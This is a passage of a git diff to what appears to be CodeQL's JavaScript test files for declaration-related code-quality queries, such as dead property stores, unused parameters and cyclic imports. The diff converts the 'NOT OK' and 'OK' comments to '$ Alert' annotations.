+ f = 4; // $ Alert
 constructor() {
 this.f = 5;
@@ -15,7 +15,7 @@ class D {
 }
 class G {
- constructor(public h: string) { // NOT OK
+ constructor(public h: string) { // $ Alert
 this.h = h;
 }
 }
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js
index 282f6bc7f4aa..6edb03fb4a67 100644
--- a/javascript/ql/test/query-tests/Declarations/DeadSto reOfProperty/real-world-examples.js
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js
@@ -2,7 +2,7 @@
 var o = f1();
 while (f2()) {
 if (f4()) {
- o.p = 42; // NOT OK
+ o.p = 42; // $ Alert
 break;
 }
 f5();
@@ -12,8 +12,8 @@
 (function(){
 var o = f1();
- o.p1 = o.p1 += 42; // NOT OK
- o.p2 -= (o.p2 *= 42); // NOT OK
+ o.p1 = o.p1 += 42; // $ Alert
+ o.p2 -= (o.p2 *= 42); // $ Alert
 });
 (function(){
@@ -26,7 +26,7 @@
 f3();
 } catch (e) {
 f4();
- o.p = 42; // NOT OK
+ o.p = 42; // $ Alert
 }
 }
 o.p = 42;
@@ -35,5 +35,5 @@
 (function(){
 var o = f1();
- o.p = f2() ? o.p = f3() : f4(); // NOT OK
+ o.p = f2() ? o.p = f3() : f4(); // $ Alert
 });
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js
index 39db5056b77b..26246c9cbf14 100644
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js
@@ -1,26 +1,26 @@
 (function(){
 var o = {};
- o.pure1 = 42; // NOT OK
+ o.pure1 = 42; // $ Alert
 o.pure1 = 42;
- o.pure2 = 42; // NOT OK
+ o.pure2 = 42; // $ Alert
 o.pure2 = 43;
 o.impure3 = 42;
 f();
 o.impure3 = 42;
- o.pure4 = 42; // NOT OK
+ o.pure4 = 42; // $ Alert
 43;
 o.pure4 = 42;
 o.impure5 = 42;
 o.impure5 = f();
- o.pure6 = f(); // NOT OK
+ o.pure6 = f(); // $ Alert
 o.pure6 = 42;
- o.pure7 = 42; // NOT OK
+ o.pure7 = 42; // $ Alert
 if(x){}
 o.pure7 = 42;
@@ -73,7 +73,7 @@
 o15.pure15_aliasWrite = 42;
 var o16 = x? o: null;
- o.pure16_simpleAliasWrite = 42; // NOT OK
+ o.pure16_simpleAliasWrite = 42; // $ Alert
 o16.pure16_simpleAliasWrite = 42;
 var o17 = {
@@ -82,31 +82,31 @@
 } // DOM
- o.clientTop = 42; // OK
+ o.clientTop = 42;
 o.clientTop = 42;
- o.defaulted1 = null; // OK
+ o.defaulted1 = null;
 o.defaulted1 = 42;
- o.defaulted2 = -1; // OK
+ o.defaulted2 = -1;
 o.defaulted2 = 42;
 var o = {};
- o.pure18 = 42; // NOT OK
- o.pure18 = 42; // NOT OK
+ o.pure18 = 42; // $ Alert
+ o.pure18 = 42; // $ Alert
 o.pure18 = 42;
 var o = {};
- Object.defineProperty(o, "setter", { // OK
+ Object.defineProperty(o, "setter", {
 set: function (value) { } });
 o.setter = "";
- var o = { set setter(value) { } }; // OK
+ var o = { set setter(value) { } };
 o.setter = "";
 var o = {
- set accessor(value) { }, // OK
+ set accessor(value) { },
 get accessor() { } };
@@ -115,24 +115,24 @@
 o.setter = 87;
 var o = {};
- Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: getInitialValue()}) // NOT OK
+ Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: getInitialValue()}) // $ Alert
 o.prop = 42;
 var o = {};
- Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: undefined}) // OK, default value
+ Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: undefined}) // OK - default value
 o.prop = 42;
 var o = {};
- Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1}) // OK
+ Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1})
 o.prop = 42;
 var o = {};
- o.pure19 = 42; // OK
+ o.pure19 = 42;
 o.some_other_property = 42;
 o.pure19 = 42;
 var o = {};
- o.pure20 = 42; // OK
+ o.pure20 = 42;
 some_other_obj.some_other_property = 42;
 o.pure20 = 42;
 });
diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js
index bdb76a070b7d..1e53a3a4a0f0 100644
--- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js
+++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js
@@ -1,8 +1,8 @@
 /*global w, x:true*/
 /* global y*/ // not a proper JSLint global declaration, but we (and JSHint) accept it anyway
 /*global: z*/ // also not a proper global declaration
-w; // OK
-x; // OK
-y; // not OK
-z; // not OK
+w;
+x;
+y; // $ Alert
+z; // $ Alert
 var x, y, z;
\ No newline at end of file
diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js
index 2fb118b1541e..2808e89550f5 100644
--- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js
+++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js
@@ -1,11 +1,11 @@
 function f(x) {
- console.log(x); // OK
+ console.log(x);
 }
-console.log(x); // NOT OK
+console.log(x); // $ Alert
 var x = 1;
 function g() {
- console.log(y); // OK (not in same function)
+ console.log(y); // OK - not in same function
 }
 var y = 1;
diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts
index 0de18d48a482..f949cd26fc76 100644
--- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts
+++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts
@@ -1,7 +1,7 @@
-@Component(Foo) // OK
+@Component(Foo)
 class Foo {}
-declare class Bar extends Baz {} // OK
+declare class Bar extends Baz {}
 declare class Baz {}
 export type { I }; // OK - does not refer to the constant 'I'
diff --git a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js
index 5014f7d5dbf3..0b5ef32b81a7 100644
--- a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js
+++ b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js
@@ -1,7 +1,6 @@
-// NOT OK
-var a, b, a = 42;
+var a, b, a = 42; // $ Alert
+
-// OK
 var x;
 var y;
 var x;
\ No newline at end of file
diff --git a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js
index 8ace9c1472ab..96cb2578e3d2 100644
--- a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js
+++ b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js
@@ -1 +1 @@
-function getStuff(number) {} // OK: don't report anything related type annotations in .js files
+function getStuff(number) {} // OK - don't report anything related type annotations in .js files
diff --git a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts
index 5aadd17c4d58..a9713de9685e 100644
--- a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts
+++ b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts
@@ -1,36 +1,36 @@ import { MyType, x } from 'somewhere'; -function join(items: T[], callback: (T) => string) { // NOT OK: (T) should be (x:T) +function join(items: T[], callback: (T) => string) { // $ Alert - (T) should be (x:T) return items.map(callback).join(", ") } -var box : (T) => T[] = (x) => [x]; // NOT OK: (T) should be (x:T) +var box : (T) => T[] = (x) => [x]; // $ Alert - (T) should be (x:T) interface EventEmitter { - addListener(listener: (T) => void): void; // NOT OK: (T) should be (x:T) - forwardFrom(other: EventEmitter, converter: (S) => T); // NOT OK: (S) should be (x:S) + addListener(listener: (T) => void): void; // $ Alert - (T) should be (x:T) + forwardFrom(other: EventEmitter, converter: (S) => T); // $ Alert - (S) should be (x:S) } interface NumberFormatter { - format(number): string; // NOT OK: (number) should be (x:number) - (number): string; // NOT OK: (number) should be (x:number) + format(number): string; // $ Alert - (number) should be (x:number) + (number): string; // $ Alert - (number) should be (x:number) } -type TextFormatter = (NumberFormatter) => string; // NOT OK: (NumberFormatter) should be (x:NumberFormatter) +type TextFormatter = (NumberFormatter) => string; // $ Alert - (NumberFormatter) should be (x:NumberFormatter) var myGlobal : MyType; -var myCallback: (MyType) => void; // NOT OK: (MyType) should be (x:MyType) +var myCallback: (MyType) => void; // $ Alert - (MyType) should be (x:MyType) -var myOtherCallback : (x) => void; // OK: nothing indicates that 'x' is a type name. +var myOtherCallback : (x) => void; // OK - nothing indicates that 'x' is a type name. 
interface Repeated { x: number; } interface Repeated { y: number; } interface Repeated { z: number; } -type Callback = (Repeated) => void; // NOT OK: but should only be reported once +type Callback = (Repeated) => void; // $ Alert - but should only be reported once class C { - getName(string) { // OK: parameter name is not part of signature + getName(string) { // OK - parameter name is not part of signature return null; } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts index dedc0b8c9601..a81bfd9a96d4 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts @@ -1,6 +1,6 @@ abstract class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } abstract setAudioProperties(); diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js index 78e0637b1b31..7af69ca17e4d 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - externs_setAudioProperties(); // OK + externs_setAudioProperties(); } externs_setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js index c8d8436ab5fe..24894c816cb1 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js 
+++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js @@ -1,7 +1,7 @@ /*global setAudioProperties*/ class Audio3D { setAudioStream() { - setAudioProperties(); // OK + setAudioProperties(); } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js index 086a8ba03c28..c55f8d03ae34 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js @@ -1,9 +1,9 @@ class X { m() { - m("default"); // OK + m("default"); } resty(...x) { - m("default"); // NOT OK + m("default"); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js index b7810e851eef..967d2ddf165b 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js index f0fa436f80b0..a7e9c39ae849 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js @@ -1,6 +1,6 @@ class Audio3D { static setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } 
diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts index 96d83d9f12ac..2000aa1b4b72 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts @@ -1,39 +1,39 @@ class GlobalClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // NOT OK + topNamespaceFunction() { + topNamespaceFunction(); // $ Alert } - childNamespaceFunction(){ - childNamespaceFunction(); // NOT OK + childNamespaceFunction() { + childNamespaceFunction(); // $ Alert } } namespace Top { class TopClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // OK + topNamespaceFunction() { + topNamespaceFunction(); } - childNamespaceFunction(){ - childNamespaceFunction(); // NOT OK, but not flagged since the namespace resolution is ignored + childNamespaceFunction() { + childNamespaceFunction(); // $ MISSING: Alert - not flagged since the namespace resolution is ignored } } } namespace Top.Child { class ChildClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // OK + topNamespaceFunction() { + topNamespaceFunction(); } - childNamespaceFunction(){ - childNamespaceFunction(); // OK + childNamespaceFunction() { + childNamespaceFunction(); } } -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js index e69101b80fd7..00fd5f8f67c4 100644 
--- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js @@ -2,7 +2,7 @@ function setAudioProperties(){} class Audio3D { setAudioStream() { - setAudioProperties(); // OK + setAudioProperties(); } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js index 4920a96353fe..0d80afa72a8d 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js @@ -1,7 +1,7 @@ /*global NOT_setAudioProperties*/ class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js index e5cd1e1c3b41..559d4f3d75f8 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - this.setAudioProperties(); // OK + this.setAudioProperties(); } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js index a55bb69e5965..396266bb6c72 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js @@ -1,6 +1,6 @@ class Audio3D { static setAudioStream() { - this.setAudioProperties(); // OK + this.setAudioProperties(); } 
diff --git a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js index 5c4444111759..6912653c27b5 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js +++ b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js @@ -2,26 +2,23 @@ var x; function f(a) { var sum = 0; - // NOT OK - for (i=0; i void; // OK! This is a property, not a method, we ignore those. - constructor(): string; // NOT OK! This a called "constructor" - new(): Date; // OK! This a constructor signature. + function (): number; // OK - Highly unlikely that it is an accident when there are other named methods in the interface. + (): number; // OK - What was probably meant above. + new:() => void; // OK - This is a property, not a method, we ignore those. + constructor(): string; // $ Alert - This a called "constructor" + new(): Date; // OK - This a constructor signature. myNumber: 123; } @@ -13,15 +13,15 @@ interface MyInterface { var a : MyFunction = null as any; interface MyFunction { - function(): number; // NOT OK! + function(): number; // $ Alert } class Foo { - new(): number { // OK! Highly unlikely that a developer confuses "constructor" and "new" when both are present. + new(): number { // OK - Highly unlikely that a developer confuses "constructor" and "new" when both are present. return 123; } - constructor() { // OK! This is a constructor. + constructor() { // OK - This is a constructor. } myString = "foobar" 
@@ -34,18 +34,18 @@ class Foo { var b : FunctionClass = new FunctionClass(); declare class FunctionClass { - function(): number; // NOT OK: + function(): number; // $ Alert } class Baz { - new(): Baz { // OK! When there is a method body I assume the developer knows what they are doing. + new(): Baz { // OK - When there is a method body I assume the developer knows what they are doing. return null as any; } } declare class Quz { - new(): Quz; // NOT OK! The developer likely meant to write constructor. + new(): Quz; // $ Alert - The developer likely meant to write constructor. } var bla = new Foo(); diff --git a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js index cb665103c1da..2ee068482544 100644 --- a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js +++ b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js @@ -1,27 +1,26 @@ function f() { - // NOT OK - s = null; + s = null; // $ Alert let s = "hi"; - // OK + s = "hello"; } function g() { - // OK + s = null; var s = "hi"; - // OK + s = "hello"; } function do_something() { - // OK + let foo; let foo; } function do_something() { - // OK + let foo; foo = "bar"; let foo; @@ -29,7 +28,7 @@ function do_something() { if (true) { // enter new scope, TDZ starts const func = function () { - console.log(myVar); // OK! + console.log(myVar); }; function otherfunc() { diff --git a/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js b/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js index 4327b4885f59..6881d51be716 100644 --- a/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js +++ b/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js 
@@ -1,4 +1,4 @@ -// OK: overly long parameter lists in external APIs aren't the fault of the externs definitions +// OK - overly long parameter lists in external APIs aren't the fault of the externs definitions function f(a, b, c, d, e, f, g, h) {} /** @externs */ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js index 1779be95e365..142bcc8d55a3 100644 --- a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js @@ -1,21 +1,21 @@ function f( x, -x, // NOT OK -\u0078 // NOT OK +x, // $ Alert +\u0078 // $ Alert ) { return; } this.addPropertyListener(prop.name, function(_, _, _, a) { proxy.delegate = a.dao; }); -// OK: for strict mode functions, duplicate parameter names are a syntax error +// OK - for strict mode functions, duplicate parameter names are a syntax error function f(x, y, x) { 'use strict'; } function f( x, -x // OK: empty function +x // OK - empty function ) { } -(a, a) => a + a; // OK: for strict mode functions, duplicate parameter names are a syntax error +(a, a) => a + a; // OK - for strict mode functions, duplicate parameter names are a syntax error diff --git a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js index a8a5fe4bb7b9..fe6c4a97b13b 100644 --- a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js 
@@ -17,9 +17,9 @@ var accessors = { }; var clobbering = { - x: 23, // NOT OK: clobbered by `x: 56` - y: "hello", // NOT OK: clobbered by `"y": "world"` - x: 42, // NOT OK: clobbered by `x: 56` + x: 23, // $ Alert - clobbered by `x: 56` + y: "hello", // $ Alert - clobbered by `"y": "world"` + x: 42, // $ Alert - clobbered by `x: 56` x: 56, "y": "world" } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts index 9455c9a161b5..17d95f835cf7 100644 --- a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts +++ b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts @@ -1,30 +1,30 @@ declare class Foobar { method(foo: number): string; - method(foo: number): number; // NOT OK. + method(foo: number): number; // $ Alert types1(): T[] - types1(): any[] // NOT OK. + types1(): any[] // $ Alert types2(): any[] - types2(): T[] // OK! + types2(): T[] types3>(t: T): number; - types3(t: T): number // OK! + types3(t: T): number on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; - on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; // NOT OK. + on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; // $ Alert foo(this: string): string; - foo(this: number): number; // OK + foo(this: number): number; bar(this: number): string; - bar(this: number): number; // NOT OK + bar(this: number): number; // $ Alert } declare class Base { method(foo: number): string; - method(foo: number): number; // NOT OK. + method(foo: number): number; // $ Alert overRiddenInSub(): string; overRiddenInSub(): number; @@ -49,13 +49,13 @@ interface Base2 { method(): "bar"; } -// OK. + interface MultiInheritanceI extends Base1, Base2 { method(): "foo"; method(): "bar"; } -// OK. + declare class MultiInheritanceC implements Base1, Base2 { method(): "foo"; method(): "bar"; 
diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts index 898b246fe9f3..6ad8967fbe1f 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts @@ -1,3 +1,3 @@ import {B} from './B'; -export let A: number = B+1; // NOT OK: `B` is not initialized if `B.ts` is imported first. +export let A: number = B+1; // $ Alert - `B` is not initialized if `B.ts` is imported first. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts index f22945c1f986..92cc89638297 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts @@ -2,4 +2,4 @@ import {A} from './A'; export let B: number = 100; -export let Q: number = A; // NOT OK: `A` is not initialized if `A.ts` is imported first. +export let Q: number = A; // $ Alert - `A` is not initialized if `A.ts` is imported first. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts index fa3dfff4b500..3b9a180a68fa 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts @@ -1,3 +1,3 @@ import {B} from './B'; -console.log(B) // OK: `B` does not import this file +console.log(B) // OK - `B` does not import this file diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts index 7cd3d8dc021c..6a66f26422d6 100644 
--- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts @@ -1,4 +1,4 @@ import {B} from './exportCycleB'; export var A = 100; -export {B}; // OK: export binding does not immediately evaluate 'B' +export {B}; // OK - export binding does not immediately evaluate 'B' diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts index 75c0593f980e..057e72352b77 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts @@ -1,3 +1,3 @@ import {A} from './exportCycleA'; -export let B = () => A; // OK: `A` is not used during initialization. +export let B = () => A; // OK - `A` is not used during initialization. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts index 2627fefa0e07..538e7fb44050 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts @@ -3,5 +3,5 @@ import {B} from './safeB'; export let A = 100; export function getSum() { - return A + B; // OK: not accessed from top-level + return A + B; // OK - not accessed from top-level } diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts index 19d7c26d1bdf..dfc1d45417a4 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts 
@@ -3,5 +3,5 @@ import {A} from './safeA'; export let B = 20; export function getProduct() { - return A * B; // OK: not accessed from top-level + return A * B; // OK - not accessed from top-level } diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts index 178e2d04399e..fbb37b4b1ae6 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts @@ -4,4 +4,4 @@ export interface TypeA { field: TypeB } -export let valueA = valueB; // OK: these imports are not cyclic at runtime +export let valueA = valueB; // OK - these imports are not cyclic at runtime diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts index 1854dd539135..15bff6ed8921 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts @@ -12,10 +12,10 @@ class SingletonTreeModel implements ITreeModel { isLeafNode(node: Node): node is LeafNode { return node instanceof LeafNode; } - isBranchNode(node: Node): node is BranchNode { // OK + isBranchNode(node: Node): node is BranchNode { return false; // This model has no branches. } - isValidNode(node: Node): boolean { // NOT OK + isValidNode(node: Node): boolean { // $ Alert return Node != null; // woops } } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts index fe32f6e80ea5..6ca356434eaf 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts 
@@ -1,7 +1,7 @@ class C { - constructor(public x: number) {} // OK + constructor(public x: number) {} } class D { - constructor(x: number) {} // NOT OK + constructor(x: number) {} // $ Alert } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts index 264928281a32..84aff19d331a 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts @@ -1,3 +1,3 @@ -function foo(this: void, x: number) { // OK: 'this' is not an ordinary parameter +function foo(this: void, x: number) { // OK - 'this' is not an ordinary parameter return x; } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js index cb7a02387c21..7e367fc67dfa 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js @@ -1,28 +1,26 @@ -// OK + [1, , 3].forEach(function(elt, idx) { console.log(idx + " is not omitted."); }); -// NOT OK -[1, , 3].forEach(function(elt, idx) { +[1, , 3].forEach(function(elt, idx) { // $ Alert sum += elt; }); -// NOT OK -function f1(x, y) { +function f1(x, y) { // $ Alert return y; } f1(23, 42); -// OK + function f2(x, y) { return y; } [].map(f2); -// OK + function f3(x, y) { return y; } @@ -30,11 +28,11 @@ function f3(x, y) { var g = f3; [].map(g); -// OK + define(function (require, exports, module) { module.x = 23; }); -// OK: starts with underscore +// OK - starts with underscore function f(_p) { } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js index 7621dca4b0da..17f6b2c218f5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js 
